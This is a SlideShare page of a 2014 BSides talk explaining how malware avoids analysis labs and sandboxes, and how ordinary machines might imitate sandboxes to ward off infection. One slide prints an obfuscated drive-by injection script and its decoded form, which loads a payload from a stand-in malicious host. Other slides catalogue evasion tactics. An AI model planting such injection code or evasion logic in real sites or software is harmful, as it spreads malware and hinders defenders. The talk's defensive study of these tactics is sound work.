SlideShare a Scribd company logo

Thinking Outside the Sand[box]

Juniper Networks
Juniper Networks

Kyle Adams - Chief Software Architect for Junos Web App Secure - presents at San Francisco's BSides 2014

Technology
1 of 40
Download to read offline
Thinking Outside the[Sand]box Kyle Adams - Juniper Networks This presentation is for educational purposes only
Introduction Chief Software Architect for Junos Web App Secure “Junos Web App Secure is a security deception technology designed to lace web applications with honeypots on-the-fly” More recently, leading efforts in malware research. Can’t share exactly why, but I can share some interesting ideas that have surfaced as a result.
Primary Goal Inoculate your machine from infection by specific classes of malware
Background • Malware Analysis Background Malware Collection Techniques o Malware Analysis Techniques o Signature Development o • Malware Authoring ROI o o • o Malware ROI Optimizing for Success Hypothetical Example Evasion o o Distribution Evasion Sandbox Evasion
Background / Malware Collection How do analysts get malware samples? • • • • • • Web Crawlers Torrents Usenet Malware Repositories Email Droppers
Background / Malware Analysis How do malware analysts inspect malware? • • • Static File Analysis Virtual Machine Sandboxing Code Emulation Sandboxing
Background / Signatures How do malware signatures get created? 1. Get a sample 2. Analyze it for unique behaviors - Generate heuristic behavior signature 3. Analyze it for unique data patterns Generate file data signature 4. Distribute new signatures to customers 5. Remove old unnecessary signatures
Background / Malware ROI Uninterrupted Lifecycle: Research Development Testing Distribution Grow Infection Base The infection base grows indefinitely. The more machines infected, the more return the attacker gets for their initial investment. In other words… Time = Money
Background / Malware ROI Interrupted Lifecycle: Research Development Testing Distribution Grow Infection Base Signature Published Sample Detected Sample Collected The infection base grows until a signature is published. It then rapidly declines in growth rate and eventually becomes negligible. The more machines infected, the more return the attacker gets for their initial investment. So… Time to DETECTION = Money
Background / Optimizing For Success Hypothetical Example: Bob spends 20 hours researching his target environment. Another 20 hours writing some ransomware and testing it. Finally, Bob pays someone to distribute his malware for 50 cents per infection, with a distribution rate of 200 clients per hour. Bob’s ransom is $300 and 10% of his victims will chose to pay. So for every hour Bob’s malware is undetected, he makes: ((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour Assume the infection rate remains constant for 72 hours, and minus Bob’s time at (~$50 an hour), Bob makes a total of $422,800.
Background / Optimizing For Success Hypothetical Example: Now assume his malware is detected and a signature is published, dropping the successful ransom collection rate to 1 client per hour. (hours_before_detection * ((200 clients * .1) * $300) - (200 clients * $0.50))) + (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50)) Detection at 6 hours: Bob makes $52,870 Detection at 12 hours: Bob makes $88,500 Detection at 18 hours: Bob makes $120,130 Detection at 24 hours: Bob makes $153,760 So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770. Thats a lot of motivation!
Background / Distribution Evasion • • You can’t analyze something you can’t get. You can’t generate signatures if you can’t analyze So if you can avoid serving malware to analysis labs, you can avoid detection and signature distribution. Distribution Evasion Distribute malware only to a select set of targets, narrow enough to exclude analysis labs.
Background / Distribution Evasion Distribution Evasion Tactics: • • • • • • • • Don’t serve to search engines (Google, Yahoo, Bing, etc…) Don’t serve to known security lab IPs (Symantec, McAfee, etc…) Don’t serve to an environment you can’t infect (Missing Plugins, Unsupported OS, etc…) Randomly choose not to serve Serve only to specific countries/IP ranges Serve only to known browsers Serve only if referer is whitelisted Serve only once per IP
Background / Distribution Evasion Distribution Evasion Implementation: 1. Inject obfuscated drive-by download hook into compromised sites: <script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c-){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]) {p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e="1" d="1"c=""+2+""></3>");</0>',17,17, 'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|wi dth|com|write'.split('|'),0,{}))</script> Deobfuscated, it looks like this: <script type="text/javascript"> var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034"; document.write("<iframe width="1" height="1" src="" + ste + ""></iframe>"); </script> But this does nothing to stop automated crawlers in a research lab.
Background / Distribution Evasion Distribution Evasion Implementation: 2. Add client-side specificity:The malware requires a specific version of flash to exploit a client, so the drive-by code can actually hide itself unless you have that version of flash. <script type="text/javascript"> … encryption/decryption code … eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b471 8585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c404258445119 1b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b171 41e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version)); </script> Now if the lab isn’t using flash version 12.0.0.44, the drive-by iframe will not
Background / Distribution Evasion Distribution Evasion Implementation: 3. Add server-side specificity and filtering:The iframe points to a server whose sole purpose is to exploit browsers and serve malware. In addition to picking the right exploit for the target client, it will also not serve malware if specific conditions are not met. • • • • • You’re not a search engine Your IP is not blacklisted, or is in a whitelist You’re using an exploitable OS and browser This is the first time you have loaded the iframe Drive by code has been injected into the domain of your referer Since the research lab doesn't know what conditions the distribution server requires, it is exceptionally difficult to trick it into serving the malware.
Background / Sandbox Evasion Sandbox Evasion Tactics: If any of the following are true, do not execute the malware payload: • • • • • • • Significant Clock Skew Debugger is attached Virtual Machine Detected No Internet Connection Unexploitable environment Sandbox Software Detected Sleep statements abort prematurely Sandboxes can only run for a fixed period of time per sample (usually 30-60 seconds), so the malware may try to run longer: • • Long sleep before payload execution Schedule payload execution for some time in the future
Background / Sandbox Evasion Sandbox evasion techniques can be grouped into several high level categories: • • • • • Specificity Triggers Detection Interruption Dialogs Any given malware sample may do zero or more of these.
Background / Sandbox Evasion Specificity: • • • • • • • Has internet connection Has correct software versions Has correct OS Has expected security policies Public IP is in correct geographical region Clock skew is minimal Account data is present (Gmail, AIM, Facebook, etc…)
Background / Sandbox Evasion Specificity: Requires Email Handing app like Outlook or ThunderBird. framework Requires Internet Connection Requires .NET Requires Win 95/98
Background / Sandbox Evasion Triggers: • • • • Sleep for several minutes Require multiple executions Wait for one or more reboots Wait for event o User opens .txt file o User launches browser o User switches to battery power o User updates windows o User installs software o User connects to WiFi o HID activity (Mouse, Keyboard, Webcam, Mic)
Background / Sandbox Evasion Triggers: Requires browser restart to trigger payload. Require a second execution.
Background / Sandbox Evasion Detection: • • • Debugger Hooks Virtual Machines o Registry Keys, Serial Numbers, MAC addresses o Processes, Services, Drivers, Open Ports o VM Specific ASM instructions Sandbox Software o Open Ports, Processes, Files
Background / Sandbox Evasion Detection: Themida: Legitimate Software Piracy Protection wrapper designed to detect VM’s and debuggers. Go figure, malware authors use it too. Debugger detection. And hey, they even explained how to turn off SoftIce (just in case you didn’t know how). No Printer?
Background / Sandbox Evasion Interruption: • • Analysis Framework Interruption: o Force Reboot or Logout o Enable Firewall / Whitelist C&C servers Screen Capture Interruption o Open dialogs minimized o Open other apps Maximized o Flashing components / Animation o Hidden MouseOver components
Background / Sandbox Evasion Interruption: Force a reboot. Screen Shot Evasion: The “Play” button flashes. We got lucky and took the screenshot at the right time.
Background / Sandbox Evasion Dialogs:
Background / Sandbox Evasion Simple Dialogs: What are they? • Fake Apps o Fake Installers o Fake Errors o • Why? o o o Prevent sandbox analysis Phish for information Legitimize  it looks real, so its probably safe  red flags (UAC, firewall notices, etc…)
Background / Sandbox Evasion Simple Dialogs: Legitimize UAC dialogs Require basic human input (click a button)
Background / Sandbox Evasion Advanced Dialogs: Require account details TOS acceptance Combination Lock Graphic based dialogs • • • •
Background / Sandbox Evasion Advanced Dialogs: Requires password. Presumably available with the download link. Captcha style dialog Fake dialog. This dialog looks similar to the default theme of XP, but is clearly not.
Deceptive Inoculation Bottom line, malware takes great care not to run in a sandbox environment. Lets all be sandboxes! (or at least pretend to be)
Deceptive Inoculation • Distribution Deception o • Prevent your personal computer from being sent malware in the first place (stop drive-by-downloads). Sandbox Deception o Prevent malware from executing a payload when launched on your personal computer.
Inoculation / Distribution Evasion Pretend you’re google bot: 1. Firefox: Install User-Agent-Switcher 2. Set User-Agent to: Googlebot-Image (Googlebot) Pretend none of your plugins are enabled: 1. Firefox: Go to Tools > Add Ons 2. For everything in the list, select “Ask To Activate” (Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...) Disable Referers: 1. Firefox: Go to about:config 2. Set “network.http.sendRefererHeader” to 0
Inoculation / Distribution Evasion Request Suspicious Content Twice: This doesn’t exist yet, but what if…. iframe: badsite.com I F R A M E embedded flash repeat: badsite.com IFRAME V A L I D A T O R Bad Server no embedded flash iframe: goodsite.com no embedded flash Good Server
Inoculation / Sandbox Evasion Permanent Debugger 1. Install a debugger 2. Hook every process automatically Spoof VMWare Artifacts: 1. Create stub exe called “VBoxService.exe” and leave it running on boot. Skew your clock 1. Change system time to be 1 year behind 2. Disable clock syncing
Inoculation / Sandbox Evasion Sandbox Emulation 1. Open ports (cuckoo: 2042, mongodb: 27017) 2. Configure as Cuckoo Guest: http://docs.cuckoosandbox.org/en/latest/installation/guest/ But make sure to cripple the agent! These changes may result in instability to the system, and would require some additional testing in a well used desktop environment. 1. Add a dll named “dbghelp.dll” to registry so it loads into every process 2. Temporarily Assign windows product ID of “76487-337-8429955-22614” (Assign on boot, revert on shutdown) Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The
Conclusion Practicality: As it stands, these techniques require some complex administrative/programming tasks, and would need to be updated regularly. Ideally these types of techniques could be packaged into software that automatically updates and manages settings for you.
Conclusion Perceived Efficacy: With just these 5 strategies, we were able to prevent 20% of malware activity in the samples we analyzed. True Efficacy: Hard to say how effective it really is, because the samples this works on, are less likely to be identified as known malware. Fortunately, this means it will reduce malware infection for samples your AV is unlikely to detect with signatures.
More Information Contact Info: Email: kadams@juniper.net Twitter: kadams_sec LinkedIn: https://www.linkedin.com/in/adamsk Presentation Material: http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-awaremalware.html

Recommended

Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...grecsl
 
The Future of Automated Malware Generation
The Future of Automated Malware GenerationThe Future of Automated Malware Generation
The Future of Automated Malware GenerationStephan Chenette
 
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)FFRI, Inc.
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 

Recommended

Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...grecsl
 
The Future of Automated Malware Generation
The Future of Automated Malware GenerationThe Future of Automated Malware Generation
The Future of Automated Malware GenerationStephan Chenette
 
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)FFRI, Inc.
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19SelectedPresentations
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Is code review the solution?
Is code review the solution?Is code review the solution?
Is code review the solution?Tiago Mendo
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston HeckerEC-Council
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014grecsl
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoTouhami Kasbaoui
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enoughSumedt Jitpukdebodin
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...Andrew Morris
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP SinghBipin Upadhyay
 
Social Media Analytics
Social Media AnalyticsSocial Media Analytics
Social Media Analyticskorzay
 
Thinking Outside The [Sand]Box
Thinking Outside The [Sand]BoxThinking Outside The [Sand]Box
Thinking Outside The [Sand]BoxMichael Genkin
 

More Related Content

What's hot

Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Is code review the solution?
Is code review the solution?Is code review the solution?
Is code review the solution?Tiago Mendo
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston HeckerEC-Council
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014grecsl
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoTouhami Kasbaoui
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...Andrew Morris
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP SinghBipin Upadhyay
 

What's hot (20)

Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Is code review the solution?
Is code review the solution?Is code review the solution?
Is code review the solution?
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston Hecker
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence Morocco
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
 

Viewers also liked

Social Media Analytics
Social Media AnalyticsSocial Media Analytics
Social Media Analyticskorzay
 
Thinking Outside The [Sand]Box
Thinking Outside The [Sand]BoxThinking Outside The [Sand]Box
Thinking Outside The [Sand]BoxMichael Genkin
 
E contracts busines law
E contracts busines lawE contracts busines law
E contracts busines lawBabasab Patil
 
ZFS Tutorial LISA 2011
ZFS Tutorial LISA 2011ZFS Tutorial LISA 2011
ZFS Tutorial LISA 2011Richard Elling
 
BCG matrix-Market Growth Share Matrix
BCG matrix-Market Growth Share MatrixBCG matrix-Market Growth Share Matrix
BCG matrix-Market Growth Share MatrixNavneet Dwivedi
 
BCG matrix by gamal arafa
BCG matrix by gamal arafaBCG matrix by gamal arafa
BCG matrix by gamal arafaGamal Arafa
 
Flight control system
Flight control systemFlight control system
Flight control systemApoorv Anand
 
Latest trends in Business Analytics
Latest trends in Business AnalyticsLatest trends in Business Analytics
Latest trends in Business AnalyticsPuneet Bhalla
 
Session Initiation Protocol
Session Initiation ProtocolSession Initiation Protocol
Session Initiation ProtocolMatt Bynum
 
Fact or Question: Analytics for UX
Fact or Question: Analytics for UXFact or Question: Analytics for UX
Fact or Question: Analytics for UXJulie Strothman
 
smart antennas ppt
smart antennas pptsmart antennas ppt
smart antennas pptsanthu652
 
Top 6 Business Intelligence & Analytics Trends for 2016
Top 6 Business Intelligence & Analytics Trends for 2016Top 6 Business Intelligence & Analytics Trends for 2016
Top 6 Business Intelligence & Analytics Trends for 2016TARGIT
 
Seminar on smart antenna systems
Seminar on smart antenna systemsSeminar on smart antenna systems
Seminar on smart antenna systemsAshok Behuria
 
Storage Area Network (San)
Storage Area Network (San)Storage Area Network (San)
Storage Area Network (San)sankcomp
 
Business analytics
Business analyticsBusiness analytics
Business analyticsSilla Rupesh
 

Viewers also liked (20)

Social Media Analytics
Social Media AnalyticsSocial Media Analytics
Social Media Analytics
 
Thinking Outside The [Sand]Box
Thinking Outside The [Sand]BoxThinking Outside The [Sand]Box
Thinking Outside The [Sand]Box
 
Customer analytics fast facts v3
Customer analytics fast facts v3Customer analytics fast facts v3
Customer analytics fast facts v3
 
Ecc2
Ecc2Ecc2
Ecc2
 
E contracts busines law
E contracts busines lawE contracts busines law
E contracts busines law
 
ZFS Tutorial LISA 2011
ZFS Tutorial LISA 2011ZFS Tutorial LISA 2011
ZFS Tutorial LISA 2011
 
BCG matrix-Market Growth Share Matrix
BCG matrix-Market Growth Share MatrixBCG matrix-Market Growth Share Matrix
BCG matrix-Market Growth Share Matrix
 
BCG matrix by gamal arafa
BCG matrix by gamal arafaBCG matrix by gamal arafa
BCG matrix by gamal arafa
 
Flight control system
Flight control systemFlight control system
Flight control system
 
Bcg matrix
Bcg matrixBcg matrix
Bcg matrix
 
Latest trends in Business Analytics
Latest trends in Business AnalyticsLatest trends in Business Analytics
Latest trends in Business Analytics
 
Red Tacton
Red TactonRed Tacton
Red Tacton
 
BCG Matrix
BCG MatrixBCG Matrix
BCG Matrix
 
Session Initiation Protocol
Session Initiation ProtocolSession Initiation Protocol
Session Initiation Protocol
 
Fact or Question: Analytics for UX
Fact or Question: Analytics for UXFact or Question: Analytics for UX
Fact or Question: Analytics for UX
 
smart antennas ppt
smart antennas pptsmart antennas ppt
smart antennas ppt
 
Top 6 Business Intelligence & Analytics Trends for 2016
Top 6 Business Intelligence & Analytics Trends for 2016Top 6 Business Intelligence & Analytics Trends for 2016
Top 6 Business Intelligence & Analytics Trends for 2016
 
Seminar on smart antenna systems
Seminar on smart antenna systemsSeminar on smart antenna systems
Seminar on smart antenna systems
 
Storage Area Network (San)
Storage Area Network (San)Storage Area Network (San)
Storage Area Network (San)
 
Business analytics
Business analyticsBusiness analytics
Business analytics
 

Similar to Thinking Outside the Sand[box]

Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 
CheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botCheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botGroup of company MUK
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Setup Your Personal Malware Lab
Setup Your Personal Malware LabSetup Your Personal Malware Lab
Setup Your Personal Malware LabDigit Oktavianto
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
